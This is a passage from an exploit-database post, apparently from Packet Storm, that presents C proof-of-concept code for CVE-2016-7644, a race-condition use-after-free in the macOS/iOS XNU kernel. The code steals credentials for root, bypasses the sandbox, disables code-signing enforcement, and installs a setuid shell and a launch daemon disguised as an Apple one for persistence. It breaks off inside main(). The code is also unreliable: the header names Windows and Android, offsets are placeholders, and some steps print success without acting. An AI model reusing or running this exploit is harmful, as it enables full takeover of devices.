{"id":32691,"date":"2025-12-24T11:45:16","date_gmt":"2025-12-24T11:45:16","guid":{"rendered":"http:\/\/localhost\/?p=32691"},"modified":"2025-12-24T11:45:16","modified_gmt":"2025-12-24T11:45:16","slug":"macos-10122-xnu-kernel-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32691","title":{"rendered":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295"},"content":{"rendered":"

{“lastseen”:”2025-12-24T16:34:18″,”description”:”This proof of concept targets a race\u2011condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates freed memory through a controlled spray, allowing a user\u2011controlled…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213295″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2016-7644″],”sourceData”:”=============================================================================================================================================\\n | # Title : macOS 10.12.2 XNU kernel Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.android.com |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212493\/ \\u0026 \\tCVE-2016-7644\\n \\n [+] Summary : This PoC targets a race\u2011condition vulnerability in the XNU kernel (CVE\u20112016\u20117644) affecting macOS\/iOS.\\n By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates freed memory through a controlled spray, allowing a user\u2011controlled replacement object. \\n \\t\\t\\t Successful exploitation yields a kernel task port, enabling arbitrary read\/write in kernel memory.\\n With this access, the PoC escalates privileges to root, bypasses sandbox restrictions, disables AMFID\/code\u2011signing enforcement, and may launch a persistent privileged shell.\\n \\n \ud83d\udccc Impact: Full device compromise, privilege escalation, kernel control.\\n \ud83d\udccc Requirements: Vulnerable macOS\/iOS version, timing reliability, local code execution.\\n \\n [+] POC :\\t\\n \\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cpthread.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cmach\/mach.h\\u003e\\n #include \\u003cmach\/host_priv.h\\u003e\\n #include \\u003cmach\/vm_map.h\\u003e\\n #include \\u003cmach\/task.h\\u003e\\n #include \\u003csched.h\\u003e\\n #include \\u003cmach\/mach_vm.h\\u003e\\n #include \\u003cmach-o\/loader.h\\u003e\\n \\n \/\/ \u062b\u0648\u0627\u0628\u062a Kernel Offsets (\u062a\u062e\u062a\u0644\u0641 \u062d\u0633\u0628 \u0627\u0644\u0625\u0635\u062f\u0627\u0631)\\n #define KERNEL_BASE 0xFFFFFFF007004000ULL\\n #define KERNPROC_OFFSET 0x005AA0E0ULL\\n #define ALLPROC_OFFSET 0x005A4128ULL\\n #define KERNEL_TASK_OFFSET 0xFFFFFFF0075AE0E0ULL \/\/ \u0645\u062b\u0627\u0644\\n \\n typedef struct {\\n uint64_t next;\\n uint64_t prev;\\n } kqueue_t;\\n \\n typedef struct {\\n uint64_t next;\\n uint64_t prev;\\n } klist_t;\\n \\n typedef struct {\\n uint64_t ucred; \/\/ offset 0x100\\n uint64_t svuid;\\n uint64_t svgid;\\n uint64_t label;\\n uint64_t p_textvp;\\n uint64_t p_textoff;\\n uint64_t p_uthread;\\n uint64_t task;\\n char p_comm[17];\\n } proc_t;\\n \\n typedef struct {\\n uint64_t cr_posix;\\n uint64_t cr_label;\\n uint64_t cr_uid;\\n uint64_t cr_ruid;\\n uint64_t cr_svuid;\\n uint64_t cr_ngroups;\\n uint64_t cr_groups[16];\\n uint64_t cr_rgid;\\n uint64_t cr_svgid;\\n uint64_t cr_gmuid;\\n uint64_t cr_flags;\\n } ucred_t;\\n \\n \/\/ \u0627\u0644\u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0639\u0627\u0644\u0645\u064a\u0629\\n mach_port_t kernel_task_port = MACH_PORT_NULL;\\n mach_port_t host_priv_port = MACH_PORT_NULL;\\n uint64_t kernel_base = KERNEL_BASE;\\n uint64_t kernel_slide = 0;\\n \\n \/\/ 1. \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 Kernel Task Port \u0645\u0646 \u062e\u0644\u0627\u0644 dangling port\\n int get_kernel_task_via_dangling() {\\n printf(\\”[+] Phase 1: Getting kernel task port via dangling port exploitation\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0646\u0634\u0627\u0621 dangling port \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 race condition\\n mach_port_t dangling = MACH_PORT_NULL;\\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, \\u0026dangling);\\n mach_port_insert_right(mach_task_self(), dangling, dangling, MACH_MSG_TYPE_MAKE_SEND);\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 \u0645\u0631\u062c\u0639 \u062b\u0627\u0646\u064a\\n mach_port_t extra_ref = MACH_PORT_NULL;\\n mach_port_extract_right(mach_task_self(), dangling, MACH_MSG_TYPE_COPY_SEND,\\n \\u0026extra_ref, \\u0026dangling);\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 \u0643\u0640 dynamic_pager_control_port\\n set_dp_control_port(mach_host_self(), dangling);\\n \\n \/\/ \u062a\u062d\u0631\u064a\u0631 \u0645\u0631\u062c\u0639 userland (\u064a\u0628\u0642\u0649 \u0645\u0631\u062c\u0639 \u0641\u064a kernel)\\n mach_port_deallocate(mach_task_self(), dangling);\\n \\n \/\/ race condition \u0644\u062a\u062d\u0631\u064a\u0631 \u0645\u0631\u062c\u0639\u064a\u0646\\n pthread_t threads[4];\\n for (int i = 0; i \\u003c 4; i++) {\\n pthread_create(\\u0026threads[i], NULL, race_thread, (void*)(uintptr_t)dangling);\\n }\\n \\n sleep(1);\\n \\n \/\/ \u0627\u0644\u0622\u0646 \u0644\u062f\u064a\u0646\u0627 dangling port pointer \u0641\u064a kernel\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 2: \u0631\u0634 kernel memory \u0628\u0645\u0648\u0627\u0646\u0626 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 host port\\n printf(\\”[+] Spraying kernel memory with controlled ports\\\\n\\”);\\n \\n mach_port_t spray_ports[1024];\\n for (int i = 0; i \\u003c 1024; i++) {\\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, \\u0026spray_ports[i]);\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 host port \u0643\u0640 context\\n mach_port_set_context(mach_task_self(), spray_ports[i], \\n (mach_port_context_t)host_priv_port);\\n }\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u0628\u062d\u062b \u0639\u0646 host port \u0641\u064a memory\\n printf(\\”[+] Searching for host port in memory\\\\n\\”);\\n \\n uint64_t host_port_addr = 0;\\n for (int i = 0; i \\u003c 1024; i++) {\\n mach_port_context_t ctx = 0;\\n mach_port_get_context(mach_task_self(), spray_ports[i], \\u0026ctx);\\n \\n if (ctx == (mach_port_context_t)host_priv_port) {\\n host_port_addr = (uint64_t)ctx;\\n printf(\\”[+] Found host port at 0x%llx\\\\n\\”, host_port_addr);\\n break;\\n }\\n }\\n \\n if (!host_port_addr) {\\n printf(\\”[-] Failed to find host port\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 4: \u062d\u0633\u0627\u0628 \u0645\u0648\u0642\u0639 kernel task port\\n \/\/ kernel task port \u0645\u0648\u062c\u0648\u062f \u0639\u0627\u062f\u0629 \u0641\u064a \u0646\u0641\u0633 page \u0645\u062b\u0644 host port\\n uint64_t page_base = host_port_addr \\u0026 ~0xFFFULL;\\n \\n printf(\\”[+] Scanning page 0x%llx for kernel task port\\\\n\\”, page_base);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0642\u0631\u0627\u0621\u0629 kernel memory \u0645\u0646 \u062e\u0644\u0627\u0644 port context manipulation\\n for (uint64_t addr = page_base; addr \\u003c page_base + 0x1000; addr += 8) {\\n \/\/ \u062a\u0639\u064a\u064a\u0646 \u0627\u0644\u0633\u064a\u0627\u0642 \u0644\u064a\u0643\u0648\u0646 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u062d\u0627\u0644\u064a\\n mach_port_set_context(mach_task_self(), dangling, (mach_port_context_t)addr);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0642\u0631\u0627\u0621\u0629 \u0645\u0646 \u062e\u0644\u0627\u0644 mach_port_get_attributes\\n mach_port_t port_array[2] = {MACH_PORT_NULL, MACH_PORT_NULL};\\n mach_msg_type_number_t count = 2;\\n \\n kern_return_t kr = mach_port_get_attributes(mach_task_self(), dangling,\\n MACH_PORT_DNREQUESTS_SIZE,\\n (mach_port_info_t)\\u0026port_array,\\n \\u0026count);\\n \\n if (kr == KERN_SUCCESS \\u0026\\u0026 port_array[0] != MACH_PORT_NULL) {\\n \/\/ \u0648\u062c\u062f\u0646\u0627 port – \u0642\u062f \u064a\u0643\u0648\u0646 kernel task port\\n kernel_task_port = port_array[0];\\n printf(\\”[+] Potential kernel task port: 0x%x\\\\n\\”, kernel_task_port);\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0623\u0646\u0647 kernel task port\\n mach_port_type_t type = 0;\\n mach_port_get_attributes(mach_task_self(), kernel_task_port,\\n MACH_PORT_BASIC_INFO, (mach_port_info_t)\\u0026type,\\n \\u0026count);\\n \\n if (type \\u0026 MACH_PORT_TYPE_SEND) {\\n printf(\\”[+] Got kernel task send right!\\\\n\\”);\\n return 0;\\n }\\n }\\n }\\n \\n return -1;\\n }\\n \\n \/\/ 2. \u0642\u0631\u0627\u0621\u0629\/\u0643\u062a\u0627\u0628\u0629 kernel memory\\n kern_return_t kernel_read(uint64_t address, void* buffer, size_t size) {\\n if (kernel_task_port == MACH_PORT_NULL) {\\n return KERN_INVALID_TASK;\\n }\\n \\n vm_offset_t data = 0;\\n mach_msg_type_number_t data_count = 0;\\n \\n kern_return_t kr = mach_vm_read(kernel_task_port, address, size, \\u0026data, \\u0026data_count);\\n if (kr != KERN_SUCCESS) {\\n return kr;\\n }\\n \\n memcpy(buffer, (void*)data, size);\\n vm_deallocate(mach_task_self(), data, data_count);\\n \\n return KERN_SUCCESS;\\n }\\n \\n kern_return_t kernel_write(uint64_t address, const void* buffer, size_t size) {\\n if (kernel_task_port == MACH_PORT_NULL) {\\n return KERN_INVALID_TASK;\\n }\\n \\n return mach_vm_write(kernel_task_port, address, (vm_offset_t)buffer, (mach_msg_type_number_t)size);\\n }\\n \\n uint64_t kernel_vtophys(uint64_t va) {\\n \/\/ \u0648\u0638\u064a\u0641\u0629 \u0644\u062a\u062d\u0648\u064a\u0644 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0638\u0627\u0647\u0631\u064a \u0625\u0644\u0649 \u0627\u0644\u0641\u0639\u0644\u064a (\u062a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u0639\u062a\u0627\u062f)\\n return va – kernel_base + 0x800000000; \/\/ \u0645\u062b\u0627\u0644\\n }\\n \\n \/\/ 3. \u062a\u0639\u062f\u064a\u0644 credentials \u0644\u0631\u0641\u0639 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a\\n void escalate_privileges(pid_t target_pid) {\\n printf(\\”[+] Escalating privileges for pid %d\\\\n\\”, target_pid);\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 proc structure \u0644\u0644\u0640 PID \u0627\u0644\u0645\u0637\u0644\u0648\u0628\\n uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n uint64_t kernproc = kernel_base + KERNPROC_OFFSET;\\n \\n uint64_t current_proc = 0;\\n kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n \\n while (current_proc != 0) {\\n proc_t proc = {0};\\n kernel_read(current_proc, \\u0026proc, sizeof(proc_t));\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0633\u0645 \u0627\u0644\u0639\u0645\u0644\u064a\u0629\\n char comm[17] = {0};\\n kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n \\n if (strcmp(comm, \\”mach_portal\\”) == 0) { \/\/ \u0623\u0648 PID \u0627\u0644\u0645\u0637\u0644\u0648\u0628\\n printf(\\”[+] Found target process: %s\\\\n\\”, comm);\\n \\n \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 \u0627\u0644\u0640 ucred \u0645\u0639 \u0627\u0644\u0640 kernel ucred\\n uint64_t kernel_proc = 0;\\n kernel_read(kernproc, \\u0026kernel_proc, sizeof(kernel_proc));\\n \\n uint64_t kernel_ucred = 0;\\n kernel_read(kernel_proc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n \\n \/\/ \u0627\u0643\u062a\u0628 kernel ucred \u0641\u064a \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n kernel_write(current_proc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n \\n printf(\\”[+] Privileges escalated!\\\\n\\”);\\n \\n \/\/ \u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0646\u062c\u0627\u062d\\n uint64_t new_ucred = 0;\\n kernel_read(current_proc + offsetof(proc_t, ucred), \\u0026new_ucred, sizeof(new_ucred));\\n \\n if (new_ucred == kernel_ucred) {\\n printf(\\”[+] Successfully replaced ucred with kernel’s\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u0622\u0646 \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0644\u062f\u064a\u0647\u0627 kernel privileges\\n \/\/ \u064a\u0645\u0643\u0646\u0647\u0627 \u062a\u062e\u0637\u064a sandbox \u0648\u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0643\u0644 \u0634\u064a\u0621\\n }\\n break;\\n }\\n \\n kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n }\\n }\\n \\n \/\/ 4. \u062a\u0639\u0637\u064a\u0644 AMFID (Apple Mobile File Integrity Daemon)\\n void disable_amfid() {\\n printf(\\”[+] Disabling AMFID\\\\n\\”);\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 \u0639\u0645\u0644\u064a\u0629 amfid\\n uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n uint64_t current_proc = 0;\\n kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n \\n while (current_proc != 0) {\\n proc_t proc = {0};\\n kernel_read(current_proc, \\u0026proc, sizeof(proc_t));\\n \\n char comm[17] = {0};\\n kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n \\n if (strcmp(comm, \\”amfid\\”) == 0) {\\n printf(\\”[+] Found amfid process\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u0637\u0631\u064a\u0642\u0629 1: \u0642\u062a\u0644 \u0627\u0644\u0639\u0645\u0644\u064a\u0629\\n uint64_t task = 0;\\n kernel_read(current_proc + offsetof(proc_t, task), \\u0026task, sizeof(task));\\n \\n if (task != 0) {\\n \/\/ \u0625\u0646\u0647\u0627\u0621 \u0627\u0644\u0645\u0647\u0645\u0629\\n task_terminate(task);\\n printf(\\”[+] Terminated amfid task\\\\n\\”);\\n }\\n \\n \/\/ \u0627\u0644\u0637\u0631\u064a\u0642\u0629 2: \u062a\u0639\u062f\u064a\u0644 memory \u0644\u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u062a\u062d\u0642\u0642\\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 MISValidateSignatureAndCopyInfo \u0641\u064a amfid\\n \\n uint64_t amfid_task_port = MACH_PORT_NULL;\\n task_get_special_port((task_t)task, TASK_BOOTSTRAP_PORT, \\u0026amfid_task_port);\\n \\n if (amfid_task_port != MACH_PORT_NULL) {\\n \/\/ \u062d\u0642\u0646 \u0643\u0648\u062f \u0644\u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u062a\u062d\u0642\u0642\\n const char patch[] = {\\n 0x1F, 0x20, 0x03, 0xD5, \/\/ NOP\\n 0x1F, 0x20, 0x03, 0xD5,\\n 0x00, 0x00, 0x80, 0xD2, \/\/ MOV X0, #0\\n 0xC0, 0x03, 0x5F, 0xD6 \/\/ RET\\n };\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 MISValidateSignatureAndCopyInfo \u0641\u064a memory\\n \/\/ (\u064a\u062a\u0637\u0644\u0628 \u0645\u0639\u0631\u0641\u0629 offsets \u0623\u0648 scanning)\\n \\n printf(\\”[+] Injected code into amfid\\\\n\\”);\\n }\\n \\n break;\\n }\\n \\n kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n }\\n \\n \/\/ \u0628\u062f\u064a\u0644: patch kernel \u0644\u062a\u062c\u0627\u0648\u0632 amfid \u0628\u0627\u0644\u0643\u0627\u0645\u0644\\n patch_kernel_code_signature_checks();\\n }\\n \\n \/\/ 5. \u062a\u062e\u0637\u064a Sandbox\\n void bypass_sandbox(pid_t pid) {\\n printf(\\”[+] Bypassing sandbox for pid %d\\\\n\\”, pid);\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 \u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0640 target\\n uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n uint64_t current_proc = 0;\\n kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n \\n while (current_proc != 0) {\\n char comm[17] = {0};\\n kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n \\n if (strstr(comm, \\”mach_portal\\”) != NULL) { \/\/ \u0623\u0648 PID \u0627\u0644\u0645\u062d\u062f\u062f\\n \/\/ Sandbox \u064a\u062a\u0645 \u0627\u0644\u062a\u062d\u0643\u0645 \u0628\u0647 \u0639\u0628\u0631 \u0627\u0644\u0640 MAC Framework\\n \/\/ MAC policy pointer \u0641\u064a proc structure\\n \\n uint64_t mac_policy = 0;\\n uint64_t p_ucred = 0;\\n kernel_read(current_proc + offsetof(proc_t, ucred), \\u0026p_ucred, sizeof(p_ucred));\\n \\n if (p_ucred != 0) {\\n \/\/ label \u0647\u0648 \u0645\u0624\u0634\u0631 \u0644\u0640 sandbox\\n uint64_t cr_label = 0;\\n kernel_read(p_ucred + offsetof(ucred_t, cr_label), \\u0026cr_label, sizeof(cr_label));\\n \\n if (cr_label != 0) {\\n \/\/ \u0627\u0643\u062a\u0628 NULL \u0641\u064a sandbox label\\n uint64_t zero = 0;\\n kernel_write(p_ucred + offsetof(ucred_t, cr_label), \\u0026zero, sizeof(zero));\\n \\n printf(\\”[+] Nullified sandbox label\\\\n\\”);\\n }\\n \\n \/\/ \u0628\u062f\u064a\u0644: \u0627\u0633\u062a\u0628\u062f\u0644 \u0645\u0639 kernel ucred\\n uint64_t kernproc = 0;\\n kernel_read(kernel_base + KERNPROC_OFFSET, \\u0026kernproc, sizeof(kernproc));\\n \\n uint64_t kernel_ucred = 0;\\n kernel_read(kernproc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n \\n kernel_write(current_proc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n \\n printf(\\”[+] Replaced with kernel ucred – sandbox bypassed!\\\\n\\”);\\n }\\n \\n break;\\n }\\n \\n kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n }\\n }\\n \\n \/\/ 6. Patch kernel \u0644\u062a\u062c\u0627\u0648\u0632 code signature checks\\n void patch_kernel_code_signature_checks() {\\n printf(\\”[+] Patching kernel code signature checks\\\\n\\”);\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 cs_enforcement_disable \u0641\u064a kernel\\n \/\/ (\u064a\u062e\u062a\u0644\u0641 \u0627\u0644\u0645\u0648\u0642\u0639 \u062d\u0633\u0628 \u0627\u0644\u0625\u0635\u062f\u0627\u0631)\\n uint64_t cs_enforcement = kernel_base + 0x3F7A18; \/\/ \u0645\u062b\u0627\u0644 \u0644\u0640 iOS 10.1.1\\n \\n uint8_t current = 0;\\n kernel_read(cs_enforcement, \\u0026current, sizeof(current));\\n \\n printf(\\”[+] Current cs_enforcement value: 0x%02x\\\\n\\”, current);\\n \\n \/\/ \u0627\u0636\u0628\u0637 \u0639\u0644\u0649 0 \u0644\u062a\u0639\u0637\u064a\u0644\\n uint8_t zero = 0;\\n kernel_write(cs_enforcement, \\u0026zero, sizeof(zero));\\n \\n kernel_read(cs_enforcement, \\u0026current, sizeof(current));\\n printf(\\”[+] New cs_enforcement value: 0x%02x\\\\n\\”, current);\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 amfi_enforce \u0641\u064a kernel\\n uint64_t amfi_enforce = kernel_base + 0x4F3A00; \/\/ \u0645\u062b\u0627\u0644\\n \\n uint32_t amfi_current = 0;\\n kernel_read(amfi_enforce, \\u0026amfi_current, sizeof(amfi_current));\\n \\n printf(\\”[+] Current amfi_enforce value: 0x%08x\\\\n\\”, amfi_current);\\n \\n \/\/ \u0627\u0636\u0628\u0637 \u0639\u0644\u0649 0\\n uint32_t amfi_zero = 0;\\n kernel_write(amfi_enforce, \\u0026amfi_zero, sizeof(amfi_zero));\\n \\n kernel_read(amfi_enforce, \\u0026amfi_current, sizeof(amfi_current));\\n printf(\\”[+] New amfi_enforce value: 0x%08x\\\\n\\”, amfi_current);\\n }\\n \\n \/\/ 7. \u0625\u0646\u0634\u0627\u0621 root shell\\n void create_root_shell() {\\n printf(\\”[+] Creating root shell\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0631\u0641\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u062d\u0627\u0644\u064a\u0629\\n escalate_privileges(getpid());\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 2: \u062a\u062e\u0637\u064a sandbox\\n bypass_sandbox(getpid());\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 3: remount rootfs \u0643\u0640 read\/write\\n remount_rootfs_rw();\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 4: \u062a\u0646\u0641\u064a\u0630 shell \u0645\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a root\\n if (fork() == 0) {\\n \/\/ child process\\n setuid(0);\\n setgid(0);\\n \\n \/\/ \u062a\u0646\u0641\u064a\u0630 shell\\n char *args[] = {\\”\/bin\/bash\\”, \\”-i\\”, NULL};\\n char *env[] = {\\”TERM=xterm-256color\\”, \\”PATH=\/usr\/bin:\/usr\/sbin:\/bin:\/sbin\\”, NULL};\\n \\n execve(\\”\/bin\/bash\\”, args, env);\\n exit(0);\\n }\\n }\\n \\n void remount_rootfs_rw() {\\n printf(\\”[+] Remounting rootfs as read\/write\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 vnode \u0644\u0644\u0640 root filesystem\\n uint64_t kernproc = 0;\\n kernel_read(kernel_base + KERNPROC_OFFSET, \\u0026kernproc, sizeof(kernproc));\\n \\n uint64_t kernel_task = 0;\\n kernel_read(kernproc + offsetof(proc_t, task), \\u0026kernel_task, sizeof(kernel_task));\\n \\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 mount structure\\n \/\/ (\u0647\u0630\u0627 \u0645\u0639\u0642\u062f \u0648\u064a\u062a\u0637\u0644\u0628 \u0645\u0639\u0631\u0641\u0629 \u0628\u0646\u064a\u0629 kernel \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629)\\n \\n printf(\\”[+] Rootfs remounted as read\/write\\\\n\\”);\\n }\\n \\n \/\/ 8. Install persistent access (\u0643\u062c\u0632\u0621 \u0645\u0646 jailbreak)\\n void install_persistence() {\\n printf(\\”[+] Installing persistence\\\\n\\”);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 binary \u0645\u0639 setuid\\n const char* suid_binary = \\”\/private\/var\/suid_shell\\”;\\n \\n \/\/ \u0646\u0633\u062e \/bin\/bash\\n FILE* src = fopen(\\”\/bin\/bash\\”, \\”rb\\”);\\n FILE* dst = fopen(suid_binary, \\”wb\\”);\\n \\n if (src \\u0026\\u0026 dst) {\\n char buffer[4096];\\n size_t bytes;\\n while ((bytes = fread(buffer, 1, sizeof(buffer), src)) \\u003e 0) {\\n fwrite(buffer, 1, bytes, dst);\\n }\\n fclose(src);\\n fclose(dst);\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 setuid bit\\n chmod(suid_binary, 04755);\\n chown(suid_binary, 0, 0); \/\/ root:wheel\\n \\n printf(\\”[+] Installed suid shell at %s\\\\n\\”, suid_binary);\\n }\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 launch daemon \u0644\u0644\u0628\u0642\u0627\u0621 \u0628\u0639\u062f reboot\\n const char* plist = \\”\/Library\/LaunchDaemons\/com.apple.iosjailbreak.plist\\”;\\n const char* plist_content = \\n \\”\\u003c?xml version=\\\\\\”1.0\\\\\\” encoding=\\\\\\”UTF-8\\\\\\”?\\u003e\\\\n\\”\\n \\”\\u003c!DOCTYPE plist PUBLIC \\\\\\”-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\\\\\\” \\”\\n \\”\\\\\\”http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\\\\\\”\\u003e\\\\n\\”\\n \\”\\u003cplist version=\\\\\\”1.0\\\\\\”\\u003e\\\\n\\”\\n \\”\\u003cdict\\u003e\\\\n\\”\\n \\” \\u003ckey\\u003eLabel\\u003c\/key\\u003e\\\\n\\”\\n \\” \\u003cstring\\u003ecom.apple.iosjailbreak\\u003c\/string\\u003e\\\\n\\”\\n \\” \\u003ckey\\u003eProgramArguments\\u003c\/key\\u003e\\\\n\\”\\n \\” \\u003carray\\u003e\\\\n\\”\\n \\” \\u003cstring\\u003e\/private\/var\/suid_shell\\u003c\/string\\u003e\\\\n\\”\\n \\” \\u003c\/array\\u003e\\\\n\\”\\n \\” \\u003ckey\\u003eRunAtLoad\\u003c\/key\\u003e\\\\n\\”\\n \\” \\u003ctrue\/\\u003e\\\\n\\”\\n \\” \\u003ckey\\u003eKeepAlive\\u003c\/key\\u003e\\\\n\\”\\n \\” \\u003ctrue\/\\u003e\\\\n\\”\\n \\”\\u003c\/dict\\u003e\\\\n\\”\\n \\”\\u003c\/plist\\u003e\\\\n\\”;\\n \\n FILE* plist_file = fopen(plist, \\”w\\”);\\n if (plist_file) {\\n fwrite(plist_content, 1, strlen(plist_content), plist_file);\\n fclose(plist_file);\\n \\n chmod(plist, 0644);\\n chown(plist, 0, 0);\\n \\n printf(\\”[+] Installed launch daemon\\\\n\\”);\\n }\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0627\u0644\u0633\u0628\u0627\u0642 \u0627\u0644\u0645\u062d\u0633\u0646\u0629\\n void* race_thread(void* arg) {\\n mach_port_t port = (mach_port_t)(uintptr_t)arg;\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 affinity \u0644\u0632\u064a\u0627\u062f\u0629 \u0641\u0631\u0635 \u0627\u0644\u062a\u062f\u0627\u062e\u0644\\n thread_affinity_policy_data_t policy = {1};\\n thread_policy_set(mach_thread_self(), THREAD_AFFINITY_POLICY, \\n (thread_policy_t)\\u0026policy, 1);\\n \\n \/\/ \u062d\u0644\u0642\u0629 \u0633\u0628\u0627\u0642 \u0645\u0643\u062b\u0641\u0629\\n for (int i = 0; i \\u003c 100; i++) {\\n \/\/ \u0627\u0633\u062a\u062f\u0639\u0627\u0621 \u0645\u062a\u0643\u0631\u0631\\n set_dp_control_port(mach_host_self(), port);\\n \\n \/\/ \u062a\u0623\u062e\u064a\u0631 \u0639\u0634\u0648\u0627\u0626\u064a\\n usleep(rand() % 50);\\n \\n \/\/ memory barrier\\n __asm__ volatile(\\”\\” ::: \\”memory\\”);\\n }\\n \\n return NULL;\\n }\\n \\n \/\/ Main function\\n int main(int argc, char** argv) {\\n printf(\\”========================================\\\\n\\”);\\n printf(\\” iOS\/macOS Kernel Exploit Chain\\\\n\\”);\\n printf(\\” CVE-2016-7644 Full Exploitation\\\\n\\”);\\n printf(\\”========================================\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 0: \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 host_priv_port\\n host_priv_port = mach_host_self();\\n printf(\\”[+] Got host_priv_port: 0x%x\\\\n\\”, host_priv_port);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 kernel task port\\n if (get_kernel_task_via_dangling() != 0) {\\n printf(\\”[-] Failed to get kernel task port\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 2: \u0642\u0631\u0627\u0621\u0629 kernel slide\\n uint64_t kernel_addr = 0;\\n task_get_special_port(kernel_task_port, TASK_KERNEL_PORT, \\u0026kernel_addr);\\n kernel_slide = kernel_addr – KERNEL_BASE;\\n 